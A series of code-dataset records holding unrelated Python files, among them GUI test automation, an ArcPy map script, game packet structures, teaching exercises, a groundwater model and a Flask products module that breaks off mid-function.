trace.')\n\tprint('------------')\n\n\tip = opt_root_ip\n\twhile (ip != None):\n\t\tip = trace.trace(ip, mac)\n\t\tprint('------------')\n\n\tprint('Trace complete.\\n')\n\n\ndef generate_config():\n\tconf = mnetsuite.config.mnet_config()\n\tprint('%s' % conf.generate_new())\n\n\nif __name__ == 
\"__main__\":\n\tmain(sys.argv[1:])\n\n","repo_name":"routeallthings/Network-Documentation-Automation","sub_path":"external/mnetsuite/mnet.py","file_name":"mnet.py","file_ext":"py","file_size_in_byte":3339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"41195898171","text":"#! python3\n# -*- coding:utf-8 -*-\n'''\nTitle: 功能操作类\nDescription: \n@author: Xushenwei\n@update: 2017年12月13日\n'''\nimport configparser, screen_point,autoit\nfrom time import sleep\nfrom common_function import verifySystemMetrics, get_base_dir, copy_config\nfrom autoit_function import MouseControl, WinControl, ProcessControl\n\n\nclass Base(object):\n\n\n\tdef __init__(self):\n\t\t# 读取配置文件\n\t\tconf = configparser.ConfigParser()\n\t\tconf.read(r\"F:\\pythondemo\\自动化测试脚本\\质检计量\\IMconfig.ini\")\n\t\t# 读取安装路径\n\t\tself.path = conf.get('install', 'path')\n\t\t# 读取登录信息\n\t\tself.username = conf.get('login', 'username')\n\t\tself.password = conf.get('login', 'password')\n\t\tself.ip = conf.get('login', 'ip')\n\t\t# 读取进程名称\n\t\tself.ShellProcess = conf.get('process', 'Shell')\n\t\tself.BECivilProcess = conf.get('process', 'BECivil')\n\t\tself.IMProcess = conf.get('process', 'IM')\n\t\tself.COProcess = conf.get('process', 'CO')\n\t\tself.SuspernsionCtrlProcess = conf.get('process', 'SuspernsionCtrl')\n\t\t# 读取窗口名称\n\t\tself.BECivilWin = conf.get('window', 'BECivil')\n\t\tself.IMWin = conf.get('window', 'IM')\n\n\tdef start_BECivli(self):\n\t\t\"\"\"登录BECivil\"\"\"\n\n\t\t# 判断屏幕分辨率是否为1920*1080\n\t\tif verifySystemMetrics(1920, 1080) == True:\n\t\t\tpass\n\t\telse:\n\t\t\traise Exception(\"分辨率不为1920*1080,请更改分辨率\")\n\n\t\t# 判断Shell、BECivil和IM是否存在,若存在则退出\n\t\tprocesses = [ProcessControl(self.IMProcess), ProcessControl(self.BECivilProcess), ProcessControl(self.ShellProcess)]\n\t\tfor process in processes:\n\t\t\tif process.exists():\n\t\t\t\tprocess.close()\n\n\t\t# 启动软件以及登录\n\t\ttry:\n\t\t\tautoit.run(self.path)\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\tprint('软件安装路径有误,或者软件安装路径中有中文,\\nstart_APP函数中path变量前需要加r!')\n\t\telse:\n\t\t\tw1 = WinControl('用户登录')\n\t\t\tw1.wait()\n\t\t\tif w1.exists():\n\t\t\t\tw1.controlSetText('[CLASS:Edit; INSTANCE:1]', self.username)\n\t\t\t\tw1.controlSetText('[CLASS:Edit; INSTANCE:2]', self.password)\n\t\t\t\tw1.controlSetText('[CLASS:Edit; INSTANCE:3]', self.ip)\n\t\t\t\tw1.controlClick('Button1')\n\t\t\t\t# 等待BECivil界面\n\t\t\t\tw2 = WinControl(self.BECivilWin)\n\t\t\t\tw2.wait(25)\n\t\t\t\tw2.setState(3)\n\t\t\t\tsleep(1)\n\t\t\t\t\"\"\"\n\t\t\t\t# 退出CO进程\n\t\t\t\tps = [ProcessControl(self.COProcess), ProcessControl(self.SuspernsionCtrlProcess)]\n\t\t\t\tfor p in ps:\n\t\t\t\t\tp.wait(6)\n\t\t\t\t\tp.close()\n\t\t\t\t\"\"\"\n\n\tdef start_IM(self):\n\t\t\"\"\"启动IM\"\"\"\n\n\t\tif WinControl(self.BECivilWin).exists():\n\t\t\tm1 = MouseControl()\n\t\t\tm1.click(self.BECivilWin, '', screen_point.资料[0], screen_point.资料[1])\n\t\t\tsleep(1)\n\t\t\tm1.click(self.BECivilWin, '', screen_point.质检计量[0], screen_point.质检计量[1])\n\t\t\t# 等待IM界面\n\t\t\tw1 = WinControl(self.IMWin)\n\t\t\tw1.wait(30)\n\t\t\t# 关闭筑业升级进程\n\t\t\tif autoit.process_exists(\"ZY.Downloader.exe\"):\n\t\t\t\tautoit.process_close(\"ZY.Downloader.exe\")\n\t\t\telse:\n\t\t\t\tpass\n\t\t\tw1.setState(3)\n\t\telse:\n\t\t\tprint('BECivil未启动,无法启动IM。')\n\n\tdef quit_BECivil(self):\n\t\t\"\"\"退出BECivil\"\"\"\n\n\t\tp = ProcessControl(self.BECivilProcess)\n\t\tif p.exists():\n\t\t\tp.close()\n\n\tdef quit_IM(self):\n\t\t\"\"\"退出IM\"\"\"\n\n\t\tp = 
ProcessControl(self.IMProcess)\n\t\tif p.exists():\n\t\t\tp.close()\n\n\nclass ContractManagement():\n\n\n\tdef __init__(self):\n\t\t# 读取配置文件\n\t\tconf = configparser.ConfigParser()\n\t\tconf.read(r\"F:\\pythondemo\\自动化测试脚本\\质检计量\\IMconfig.ini\")\n\t\t# 读取窗口名称\n\t\tself.BECivilWin = conf.get('window', 'BECivil')\n\t\tself.IMWin = conf.get('window', 'IM')\n\t\t# 读取需要输入文字\n\t\tself.message1 = conf.get('messages', '合同编号')\n\t\tself.message2 = conf.get('messages', '合同金额')\n\t\tself.message3 = conf.get('messages', '建设单位')\n\t\tself.message4 = conf.get('messages', '施工单位')\n\t\tself.message5 = conf.get('messages', '起止桩号')\n\t\tself.message6 = conf.get('messages', '合同段长度')\n\t\tself.message7 = conf.get('messages', '标段号')\n\t\tself.message8 = conf.get('messages', '项目名称')\n\t\tself.message9 = conf.get('messages', '监理名称')\n\t\tself.message10 = conf.get('messages', '结束桩号')\n\t\tself.message11 = conf.get('messages', '工期')\n\t\tself.message12 = conf.get('messages', '施工负责人')\n\t\tself.message13 = conf.get('messages', '总监理工程师')\n\t\tself.message14 = conf.get('messages', '项目总工')\n\n\tdef creat_contract_management(self):\n\t\t# 新增合同\n\n\t\tif WinControl(self.IMWin).exists():\n\t\t\tm1 = MouseControl()\n\t\t\tm1.click(self.IMWin, '', screen_point.选择项目部[0], screen_point.选择项目部[1])\n\t\t\tsleep(1)\n\t\t\tm1.click(self.IMWin, '', screen_point.工程管理[0], screen_point.工程管理[1])\n\t\t\tm1.click(self.IMWin, '', screen_point.合同管理[0], screen_point.合同管理[1])\n\t\t\tm1.click(self.IMWin, '', screen_point.新增施工合同[0], screen_point.新增施工合同[1])\n\t\t\tsleep(5)\n\t\t\tm1.click(self.IMWin, '', screen_point.合同编号[0], screen_point.合同编号[1])\n\t\t\tautoit.send(self.message1)\n\t\t\tm1.click(self.IMWin, '', screen_point.合同金额[0], screen_point.合同金额[1])\n\t\t\tautoit.send(self.message2)\n\t\t\tm1.click(self.IMWin, '', screen_point.合同签订日期[0], screen_point.合同签订日期[1])\n\t\t\tm1.click(self.IMWin, '', screen_point.今天签订[0], screen_point.今天签订[1])\n\t\t\tm1.click(self.IMWin, '', screen_point.建设单位[0], screen_point.建设单位[1])\n\t\t\tautoit.send(self.message3)\n\t\t\tm1.click(self.IMWin, '', screen_point.施工单位[0], screen_point.施工单位[1])\n\t\t\tautoit.send(self.message4)\n\t\t\tm1.click(self.IMWin, '', screen_point.起止桩号[0], screen_point.起止桩号[1])\n\t\t\tautoit.send(self.message5)\n\t\t\tm1.click(self.IMWin, '', screen_point.合同段长度[0], screen_point.合同段长度[1])\n\t\t\tautoit.send(self.message6)\n\t\t\tm1.click(self.IMWin, '', screen_point.计划开工日期[0], screen_point.计划开工日期[1])\n\t\t\tm1.click(self.IMWin, '', screen_point.今天开工[0], screen_point.今天开工[1])\n\t\t\tm1.click(self.IMWin, '', screen_point.标段号[0], screen_point.标段号[1])\n\t\t\tautoit.send(self.message7)\n\t\t\tm1.click(self.IMWin, '', screen_point.项目名称[0], screen_point.项目名称[1])\n\t\t\tautoit.send(self.message8)\n\t\t\tm1.click(self.IMWin, '', screen_point.监理名称[0], screen_point.监理名称[1])\n\t\t\tautoit.send(self.message9)\n\t\t\tm1.click(self.IMWin, '', screen_point.结束桩号[0], screen_point.结束桩号[1])\n\t\t\tautoit.send(self.message10)\n\t\t\tm1.click(self.IMWin, '', screen_point.计划完工日期[0], screen_point.计划完工日期[1])\n\t\t\tm1.click(self.IMWin, '', screen_point.今天完工[0], screen_point.今天完工[1])\n\t\t\tm1.move(self.IMWin, '', 960, 590)\n\t\t\tautoit.mouse_wheel('down', 2)\n\t\t\tm1.click(self.IMWin, '', screen_point.工期[0], screen_point.工期[1])\n\t\t\tautoit.send(self.message11)\n\t\t\tm1.click(self.IMWin, '', screen_point.保存[0], screen_point.保存[1])\n\t\telse:\n\t\t\traise Exception('没有检测到IM窗口!')\n\n\tdef edit_contract_management(self):\n\t\t\"\"\"编辑合同\"\"\"\n\n\t\tif WinControl(self.IMWin).exists():\n\t\t\tm1 = 
MouseControl()\n\t\t\tm1.click(self.IMWin, '', screen_point.编辑施工合同[0], screen_point.编辑施工合同[1])\n\t\t\tsleep(3)\n\t\t\tm1.click(self.IMWin, '', screen_point.施工负责人[0], screen_point.施工负责人[1])\n\t\t\tautoit.send(self.message12)\n\t\t\tm1.click(self.IMWin, '', screen_point.总监理工程师[0], screen_point.总监理工程师[1])\n\t\t\tautoit.send(self.message13)\n\t\t\tm1.click(self.IMWin, '', screen_point.项目总工[0], screen_point.项目总工[1])\n\t\t\tautoit.send(self.message14)\n\t\t\tm1.click(self.IMWin, '', screen_point.保存[0], screen_point.保存[1])\n\t\telse:\n\t\t\traise Exception('没有检测到IM窗口!')\n\n\tdef delete_contract_managemeng(self):\n\t\t\"\"\"删除合同\"\"\"\n\n\t\tif WinControl(self.IMWin).exists():\n\t\t\tm1 = MouseControl()\n\t\t\tm1.click(self.IMWin, '', screen_point.工程管理[0], screen_point.工程管理[1])\n\t\t\tm1.click(self.IMWin, '', screen_point.合同管理[0], screen_point.合同管理[1])\n\t\t\tm1.click(self.IMWin, '', screen_point.删除施工合同[0], screen_point.删除施工合同[1])\n\t\t\tm1.click(self.IMWin, '', screen_point.确认删除合同[0], screen_point.确认删除合同[1])\n\t\telse:\n\t\t\traise Exception('没有检测到IM窗口!')\n\n\n# 检查各对象是否出错\nif __name__ == '__main__':\n\tb = Base()\n\tcm = ContractManagement()\n\tb.start_BECivli()\n\tb.start_IM()\n\tsleep(30)\n\tcm.creat_contract_management()\n\tsleep(25)\n\tcm.edit_contract_management()\n\t#cm.delete_contract_managemeng()\n\t#b.quit_IM()\n\t#b.quit_BECivil()\n","repo_name":"Simonluepang/Upgrading-is-the-happiest-thing","sub_path":"UserInterface/AotuIt/CivilFunction/Functions/basic_functions/baseclass.py","file_name":"baseclass.py","file_ext":"py","file_size_in_byte":8482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"31172439033","text":"import os\r\nimport arcpy\r\nimport logging\r\n\r\nif __name__ == '__main__':\r\n\r\n # The logging setting has done\r\n logging.basicConfig(filename=\"file.log\",\r\n level=logging.INFO,\r\n format='%(levelname)s %(asctime)s %(message)s')\r\n logging.info(\"All setting of the logging is done\")\r\n\r\n # Set all the paths\r\n path = os.getcwd()\r\n aprx_path = os.path.join(path, \"ArcGIS\\Project_01\\Project_01.aprx\")\r\n gdb_path = os.path.join(path, \"ACC.gdb\")\r\n symbology_path = os.path.join(path, \"Symbology\")\r\n logging.info(\"All paths are defined\")\r\n\r\n # Read aprx project\r\n if arcpy.Exists(aprx_path):\r\n aprx_project = arcpy.mp.ArcGISProject(aprx_path)\r\n logging.info(\"aprx project is read\")\r\n else:\r\n logging.error(\"aprx project is not exist\")\r\n\r\n # Select the first map\r\n map_1 = aprx_project.listMaps()[0]\r\n\r\n # Set the path of the gdb as environment\r\n arcpy.env.workspace = gdb_path\r\n\r\n # Select all the symbologies inside the directory\r\n symbology_list = []\r\n symbology_list = [item.split(\".\")[0] for item in os.listdir(symbology_path)]\r\n\r\n list_layers = map_1.listLayers()\r\n layer_names = [layer.name for layer in list_layers]\r\n fclist = arcpy.ListFeatureClasses()\r\n\r\n for fc in fclist:\r\n if fc not in layer_names and fc in symbology_list:\r\n lay = gdb_path + os.sep + fc\r\n map_1.addDataFromPath(lay)\r\n logging.info(f\"{fc} is added to the map\")\r\n\r\n for i in range(len(map_1.listLayers())):\r\n for j in symbology_list:\r\n if map_1.listLayers()[i].name == j:\r\n lyrx_path = symbology_path + os.sep + j + \".lyrx\"\r\n arcpy.management.ApplySymbologyFromLayer(map_1.listLayers()[i],\r\n lyrx_path,\r\n None, \"DEFAULT\")\r\n logging.info(f\"symbology of the {j} is changed\")\r\n\r\n aprx_project.save()\r\n logging.info(\"Project is 
saved\")\r\n","repo_name":"AmirSarrafzadeh/ArcPy_Change_Symbology","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37388951017","text":"from ctypes import *\n\nfrom FFxivPythonTrigger.memory.struct_factory import OffsetStruct\n\n\nclass ServerActionEffectHeader(OffsetStruct({\n 'animation_target_id': c_uint,\n 'unk1': c_uint,\n 'action_id': c_uint,\n 'global_effect_counter': c_uint,\n 'animation_lock_time': c_float,\n 'some_target_id': c_uint,\n 'hidden_animation': c_ushort,\n 'rotation': c_ushort,\n 'action_animation_id': c_ushort,\n 'variantion': c_ubyte,\n 'effect_display_type': c_ubyte,\n 'unk2': c_ubyte,\n 'effect_count': c_ubyte,\n 'padding': c_ushort,\n})):\n animation_target_id: int\n unk1: int\n action_id: int\n global_effect_counter: int\n animation_lock_time: float\n some_target_id: int\n hidden_animation: int\n rotation: int\n action_animation_id: int\n variantion: int\n effect_display_type: int\n unk2: int\n effect_count: int\n padding: int\n\n\nclass ServerActionEffectEntry(OffsetStruct({\n 'type': c_ubyte,\n 'param1': c_ubyte,\n 'param2': c_ubyte,\n 'param3': c_ubyte,\n 'param4': c_ubyte,\n 'param5': c_ubyte,\n 'main_param': c_ushort,\n})):\n type: int\n param1: int\n param2: int\n param3: int\n param4: int\n param5: int\n main_param: int\n\n\nclass ServerActionEffectType:\n max_count = 0\n header: ServerActionEffectHeader\n padding1: int\n padding2: int\n effects: list[list[ServerActionEffectEntry]]\n padding3: int\n padding4: int\n target_id: list[int]\n padding5: int\n\n\nclass ServerActionEffect1(OffsetStruct({\n 'header': ServerActionEffectHeader,\n 'padding1': c_uint,\n 'padding2': c_ushort,\n 'effects': ServerActionEffectEntry * 8 * 1,\n 'padding3': c_ushort,\n 'padding4': c_uint,\n 'target_id': c_ulonglong * 1,\n 'padding5': c_uint,\n}), ServerActionEffectType):\n max_count = 1\n\n\nclass ServerActionEffect8(OffsetStruct({\n 'header': ServerActionEffectHeader,\n 'padding1': c_uint,\n 'padding2': c_ushort,\n 'effects': ServerActionEffectEntry * 8 * 8,\n 'padding3': c_ushort,\n 'padding4': c_uint,\n 'target_id': c_ulonglong * 8,\n 'padding5': c_uint,\n}, 0x27c), ServerActionEffectType):\n max_count = 8\n\n\nclass ServerActionEffect16(OffsetStruct({\n 'header': ServerActionEffectHeader,\n 'padding1': c_uint,\n 'padding2': c_ushort,\n 'effects': ServerActionEffectEntry * 8 * 16,\n 'padding3': c_ushort,\n 'padding4': c_uint,\n 'target_id': c_ulonglong * 16,\n 'padding5': c_uint,\n}, 0x4BC), ServerActionEffectType):\n max_count = 16\n\n\nclass ServerActionEffect24(OffsetStruct({\n 'header': ServerActionEffectHeader,\n 'padding1': c_uint,\n 'padding2': c_ushort,\n 'effects': ServerActionEffectEntry * 8 * 24,\n 'padding3': c_ushort,\n 'padding4': c_uint,\n 'target_id': c_ulonglong * 24,\n 'padding5': c_uint,\n}), ServerActionEffectType):\n max_count = 24\n\n\nclass ServerActionEffect32(OffsetStruct({\n 'header': ServerActionEffectHeader,\n 'padding1': c_uint,\n 'padding2': c_ushort,\n 'effects': ServerActionEffectEntry * 8 * 32,\n 'padding3': c_ushort,\n 'padding4': c_uint,\n 'target_id': c_ulonglong * 32,\n 'padding5': c_uint,\n}), ServerActionEffectType):\n max_count = 32\n\n\nclass ServerActionEffectDisplayType:\n HideActionName = 0\n ShowActionName = 1\n ShowItemName = 2\n MountName = 13\n\n\nSWING_TYPES = {\n 0x1: {'ability', 'miss'},\n 0x2: {'ability'},\n 0x3: {'ability'},\n 0x4: {'healing'},\n 0x5: {'blocked', 'ability'},\n 
0x6: {'parry', 'ability'},\n 0x7: {'invincible'},\n 0xA: {'power_drain'},\n 0xB: {'power_healing'},\n 0xD: {'tp_healing'},\n 0xE: {'buff', 'to_target'},\n 0xF: {'buff', 'to_source'},\n 0x18: {'threat'},\n 0x19: {'threat'},\n 0x1B: {'combo'},\n 0x20: {'knock_back'},\n 0x21: {'absorb'},\n 0x33: {'instant_death'},\n # 0x34: {'buff'},\n 0x37: {'buff', 'resistance'},\n 0x3D: {'gauge_add'},\n}\n\nTYPE_HAVE_AMOUNT = {'ability', 'healing', 'power_drain', 'power_healing''tp_healing'}\nTYPE_HAVE_CRITICAL_DIRECT = {'ability', 'healing'}\nABILITY_TYPE = {\n 1: {'physics', 'blow'},\n 2: {'physics', 'slash'},\n 3: {'physics', 'spur'},\n 4: {'physics', 'shoot'},\n 5: {'magic'},\n 6: {'diablo'},\n 7: {'sonic'},\n 8: {'limit_break'},\n}\nABILITY_SUB_TYPE = {\n 1: {'fire'},\n 2: {'ice'},\n 3: {'wind'},\n 4: {'ground'},\n 5: {'thunder'},\n 6: {'water'},\n 7: {'unaspected'},\n}\n","repo_name":"AutumnInSouth/FFxivPythonTrigger3","sub_path":"plugins/XivNetwork/message_processors/zone_server/ability/struct.py","file_name":"struct.py","file_ext":"py","file_size_in_byte":4368,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"35"} +{"seq_id":"7331754507","text":"# 이진 힙\n'''\n완전이진트리는 1번 노드부터 빈틈없이 만들어지는 트리이기 때문에\n트리를 리스트로 구현했을 때\n자식노드 N에 대해 부모노드는 N//2\n왼쪽노드가 n * 2, 오른쪽 노드가 n * 2 + 1\n'''\n\nfor t in range(int(input())):\n N = int(input())\n lst = list(map(int, input().split()))\n h = [0] * (N + 1)\n last = 0\n for n in lst:\n last += 1\n h[last] = n\n c = last\n # 부모노드가 존재하고 자식노드 < 부모노드이면\n # 위치 바꿔주기\n while c//2 > 0 and h[c] < h[c//2]:\n h[c], h[c//2] = h[c//2], h[c]\n c = c//2\n c = last // 2\n sol = 0\n # 조상노드 합 구하기\n # 노드가 존재하면\n while c > 0:\n sol += h[c]\n c = c//2\n\n print(f'#{t + 1} {sol}')","repo_name":"minguno/TIL","sub_path":"Algorithm/0317_algorithm/bin_heap_min.py","file_name":"bin_heap_min.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4207529295","text":"'''\nCreated on 2 dic. 
2019\n\n@author: Ruby\n'''\n'''\nEn python no existen los arrays de forma nativa, solo las listas\n\nPueden ser implementados con un modulo llamado 'array'\n\nLas listas son una implementacion mas poderosa de los arrays\n \n'''\nedades = [20, 36, 37, 18]\n\ntemperaturas = []\n#temperaturas[0] = 32.25 NO SE PERMITE EN LAS LISTAS\n\n# para guardar informacion en un vector se usa la funcion APPEND\ntemperaturas.append(32.54)\n\nprint(edades[0])\nprint(len(edades))\nprint(len(temperaturas))\n\nvectorMagico = [\"Ruby\", 30, \"Berumen\", 50, True, 56.38]\n\nprint(\"Cuantas calificaciones deseas ingresar: \")\ncantidad=int(input())\n\ncalificaciones=[]\nfor i in range(cantidad):\n calificaciones.append(int(input(\"Ingresa calificacion: \")))\n \nprint(calificaciones)\n\n\n\n","repo_name":"RubyBerumen/1roISC","sub_path":"FDP/Sesion30_Ejemplo_Vectores/Ejemplo_Vectores.py","file_name":"Ejemplo_Vectores.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34503729534","text":"#METHODS OF DICTIONARY\r\n\r\n#clear()-Removes all the elements from dictionary\r\nl1={\"k1\":\"1\",\"k2\":\"2\",\"k3\":\"3\"}\r\nl1.clear()\r\nprint(l1)\r\n\r\n\r\n#copy()-Returns a copy of the dictionary\r\nl1={\"k1\":\"1\",\"k2\":\"2\",\"k3\":\"3\"}\r\ni=l1.copy()\r\nprint(i)\r\n\r\n#fromkeys()-Returns a dictionary with a specified keys and value\r\n#creates a dictionary with 3 \r\ni=('k1','k2','k3')\r\nj=7\r\nl1=dict.fromkeys(i,j)\r\nprint(l1)\r\n\r\n#get()-Returns the value of the specified key\r\nl1={\"k1\":\"1\",\"k2\":\"2\",\"k3\":\"3\"}\r\ni=l1.get(\"k2\")\r\nprint(i)\r\n\r\n#items()-Returns a list containing tuple for each key-value pairs\r\nl1={\"k1\":\"1\",\"k2\":\"2\",\"k3\":\"3\"}\r\ni=l1.items()\r\nprint(i)\r\n\r\n#keys()-Returns a list containing dictionary's keys\r\nl1={\"k1\":\"1\",\"k2\":\"2\",\"k3\":\"3\"}\r\ni=l1.keys()\r\nprint(i)\r\n\r\n#pop()-Removes the element with a specified key\r\nl1={\"k1\":\"1\",\"k2\":\"2\",\"k3\":\"3\"}\r\nl1.pop(\"k2\")\r\nprint(l1)\r\n\r\n#popitem()-Returns the last inserted key-value pair\r\nl1={\"k1\":\"1\",\"k2\":\"2\",\"k3\":\"3\"}\r\nl1.popitem()\r\nprint(l1)\r\n\r\n#setdefault()-Returns the value of the specified key. 
If the key does not exist: insert the key, with the specified value\r\nl1={\"k1\":\"1\",\"k2\":\"2\",\"k3\":\"3\"}\r\nl1.setdefault(\"k4\", \"SHIVAM\")\r\nprint(l1)\r\n\r\n#update()-Updates the dictionary with the specified key-value pairs\r\nl1={\"k1\":\"1\",\"k2\":\"2\",\"k3\":\"3\"}\r\nl1.update({\"k5\":\"tree\"})\r\nprint(l1)\r\n\r\n#values()-Returns a list of all values in the dictionary\r\nl1={\"k1\":\"1\",\"k2\":\"2\",\"k3\":\"3\"}\r\ni=l1.values()\r\nprint(i)","repo_name":"SHIVAMKUMAR51/Practice_python2","sub_path":"dictionary_methods.py","file_name":"dictionary_methods.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"19399820813","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 25 13:30:46 2012\n\n@author: Sat Kumar Tomer\n@website: www.ambhas.com\n@email: satkumartomer@gmail.com\n\nthis module reads the data from xls file\nperform the lumped grounwater level modelling\nthen save the output as xls file and images\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport xlrd, xlwt\nfrom ambhas.gw import GW_1D\nimport scikits.timeseries as ts\nimport scikits.timeseries.lib.plotlib as tpl\n\n\ndef gw_model_file(in_fname, out_fname, figure_dir=None):\n \"\"\"\"\n input:\n in_fname: name of input xls file\n out_fname: name of the output xls file\n figure_dir: name of the directory where to save the out figures\n \"\"\"\n\n # read the data from xls file\n in_book = xlrd.open_workbook(in_fname)\n sheet_names = in_book.sheet_names()\n sheet_names.remove('legend')\n \n out_book = xlwt.Workbook()\n for sheet_name in sheet_names:\n \n sheet = in_book.sheet_by_name(sheet_name)\n # read the input for one well\n t = sheet.nrows-1\n year = np.empty(t, 'int')\n month = np.empty(t, 'int')\n rainfall = np.empty(t)\n pumping = np.empty(t)\n meas_gwl = np.empty(t)\n r = np.empty(t)\n for i in range(t):\n year[i] = sheet.cell_value(i+1,0)\n month[i] = sheet.cell_value(i+1,1)\n rainfall[i] = sheet.cell_value(i+1,2)\n pumping[i] = sheet.cell_value(i+1,3)\n meas_gwl[i] = sheet.cell_value(i+1,4)\n r[i] = sheet.cell_value(i+1,5)\n F = sheet.cell_value(1,6)\n G = sheet.cell_value(1,7)\n hmin = sheet.cell_value(1,8)\n \n # run the model\n gw_model = GW_1D(rainfall, pumping)\n gw_model.set_parameters(F, G, r, hmin)\n \n hini = meas_gwl[0]\n gw_model.run_model(hini,t)\n sim_gwl = gw_model.h\n lam = gw_model.lam\n sy = gw_model.sy\n discharge = gw_model.discharge\n print('Sy = %.5f'%sy)\n \n #write the output\n sheet = out_book.add_sheet(sheet_name)\n sheet.write(0,0,'year')\n sheet.write(0,1,'month')\n sheet.write(0,2,'rainfall')\n sheet.write(0,3,'pumping')\n sheet.write(0,4,'measured gwl')\n sheet.write(0,5,'simulated gwl')\n sheet.write(0,6,'recharge')\n sheet.write(0,7,'discharge')\n sheet.write(0,8,'lambda')\n sheet.write(0,9,'sy')\n for i in range(t):\n sheet.write(i+1,0,year[i])\n sheet.write(i+1,1,month[i])\n sheet.write(i+1,2,rainfall[i])\n sheet.write(i+1,3,pumping[i])\n sheet.write(i+1,4,meas_gwl[i])\n sheet.write(i+1,5,sim_gwl[i])\n sheet.write(i+1,6,rainfall[i]*r[i])\n sheet.write(i+1,7,discharge[i])\n sheet.write(1,8,lam)\n sheet.write(1,9,sy)\n \n first_date = ts.Date(freq='M',year=year[0],month=month[1])\n gw_meas_series = ts.time_series(meas_gwl, start_date=first_date)\n gw_sim_series = ts.time_series(sim_gwl, start_date=first_date)\n \n if figure_dir is not None:\n # save the figure\n fig = plt.figure(figsize=(6, 4.5))\n plt.plot(gw_meas_series, 'r', lw=3, 
label='measured')\n plt.plot(gw_sim_series, 'g', lw=3, label='simulated')\n plt.legend(loc='best')\n plt.ylabel('Groundwater Level' )\n plt.savefig(figure_dir+'%s.png'%sheet_name)\n plt.close()\n \n print('%s completed succesfully'%sheet_name)\n \n # save the xls file\n out_book.save(out_fname)\n\nif __name__=='__main__':\n in_file = '/home/tomer/svn/ambhas/examples/input_easy_gw.xls'\n out_file = '/home/tomer/svn/ambhas/examples/output/easy_gw.xls'\n figure_dir = '/home/tomer/svn/ambhas-wiki/images/'\n foo = gw_model_file(in_file, out_file, figure_dir)\n \n","repo_name":"rkawsar/ambhas","sub_path":"ambhas/easy_gw_1d.py","file_name":"easy_gw_1d.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"25015666523","text":"from django import template\n\nregister = template.Library()\n\n\n# Custom filter tag to load in templates\n@register.filter(name='dict_length') # name of the filter to use in templates\ndef dict_length(parent, key):\n my_dict = parent.get(key, {})\n\n return len(my_dict.keys())\n\n\n# tags can take multiple params and can have access to the context data from template\n@register.simple_tag(name='cart_data')\ndef get_cart_data(parent, key):\n my_dict = parent.get(key, {})\n\n return len(my_dict.keys())\n\n\n@register.inclusion_tag(filename='bookings/tags/cart.html', name='cart_link')\ndef get_cart_link(session):\n cart = session.get('cart', {})\n\n return {\n 'items': len(cart.keys()),\n }\n","repo_name":"AlexandruFlorea/f1-car-rental-app","sub_path":"bookings/templatetags/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"18310023765","text":"from flask import Flask, render_template, url_for, url_for, Blueprint, request,redirect,flash\nfrom .models import Fabric, Product, Design, VariantMaster\nfrom . 
import db\n\nprod = Blueprint('products', __name__)\n\n@prod.route('/products', methods=['GET','POST'])\ndef main():\n \n fabrics = Fabric.query.all()\n allproducts = Product.query.all()\n allvariants = VariantMaster.query.all()\n alldesings = ''\n if request.form:\n pid = int(request.form.get('product_select'))\n p = Product.query.get(pid)\n alldesings = p.designs\n return render_template('products.html',\n fabrics=fabrics, allproducts=allproducts, alldesings=alldesings,\n allvariants=allvariants)\n\n@prod.route('/addFabrics', methods=['POST'])\ndef add_fabric():\n if request.form:\n fabric_name = request.form.get('fabric_name').title()\n f = Fabric.query.filter_by(fabric_name=fabric_name).first()\n if f:\n flash('Fabric Already Ceated', category='alert-danger')\n return redirect(url_for('products.main'))\n else: \n fabric = Fabric(fabric_name = fabric_name)\n db.session.add(fabric)\n db.session.commit()\n flash('Fabric Created', category='alert-success')\n return redirect(url_for('products.main'))\n\n@prod.route('/addProducts', methods=['POST'])\ndef add_product():\n if request.form:\n f_id = request.form.get('fabric_select')\n product_name = request.form.get('product_name').title()\n p = Product.query.filter_by(product_name=product_name).first()\n if p:\n flash('Product Already Created', category='alert-danger')\n return redirect(url_for('products.main'))\n else:\n product = Product(fabric_id=f_id, product_name=product_name)\n db.session.add(product)\n db.session.commit()\n flash('Product Created', category='alert-success')\n return redirect(url_for('products.main'))\n\n@prod.route('/addDesigns', methods=['POST'])\ndef add_design():\n if request.form:\n pid = request.form.get('product_name')\n p = Product.query.get(pid)\n p1 = p.designs\n print(p1)\n des = [i.design_no for i in p1]\n print(des)\n if p:\n num = int(request.form.get('design_no'))\n if num in des:\n flash('Design Already Registered', category='alert-danger')\n return redirect(url_for('products.main'))\n else:\n p.addDesign(num)\n flash('Design Created', category='alert-success')\n return redirect(url_for('products.main'))\n\n@prod.route('/addVaraints', methods=['POST'])\ndef add_variants():\n if request.form:\n v = request.form.get('variant_name').title()\n if v:\n vq = VariantMaster.query.filter_by(variant_name=v).first()\n if vq:\n flash(f'{vq.variant_name} is already Registered', category='alert-danger')\n return redirect(url_for('products.main'))\n else:\n v1 = VariantMaster(variant_name=v)\n db.session.add(v1)\n db.session.commit()\n flash(f'{v1.variant_name} Added to Master', category='alert-success')\n return redirect(url_for('products.main'))\n\n@prod.route('/addItem', methods=['POST'])\ndef add_item():\n if request.form:\n design_no = request.form.get('design_select')\n d = Design.query.get(design_no)\n if d:\n vid = request.form.getlist('varaint_name')\n for v in vid:\n v = int(v)\n 